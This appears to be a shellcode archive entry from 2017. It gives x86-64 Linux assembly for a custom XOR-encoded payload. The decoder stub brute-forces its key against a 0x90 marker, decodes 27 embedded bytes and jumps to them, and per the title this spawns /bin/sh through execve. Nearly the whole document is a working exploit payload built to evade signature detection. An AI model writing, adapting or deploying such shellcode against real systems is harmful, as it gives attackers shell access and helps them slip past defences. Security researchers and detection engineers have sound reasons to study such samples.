Linux/x64 - Custom Encoded XOR + execve(/bin/sh) Shellcode

2017-12-16 16:05:15

global _start

section .text

_start:
jmp find_address ; jmp short by default
decoder:
; Get the address of the string
pop rdi
push rdi
pop rbx

; get the first byte and bruteforce till you get the token 0x90
mov byte dl, [rdi]
xor rdi,rdi ; key that will be incremented from 0x00 to 0xff
bruteforce:
inc rdi
mov al,dl
xor al,dil
cmp al,0x90
jne bruteforce

push 27 ; shellcode length (given by encoder)
pop rcx
mov al,dil
push rbx
pop rdi
decode:
xor byte [rdi], al
inc rdi
loop decode

jmp rbx ; jmp to decoded shellcode

find_address:
call decoder
encoded db 0x23,0xd9,0x88,0xeb,0x2a,0xe1,0xfb,0x08,0x9c,0x9c,0xd1,0xda,0xdd,0x9c,0xc0,0xdb,0xe0,0xe7,0xec,0xe1,0xe7,0xed,0xe4,0xe7,0xe9,0xbc,0xb6

Fixes

No fixes

In order to submit a new fix you need to be registered.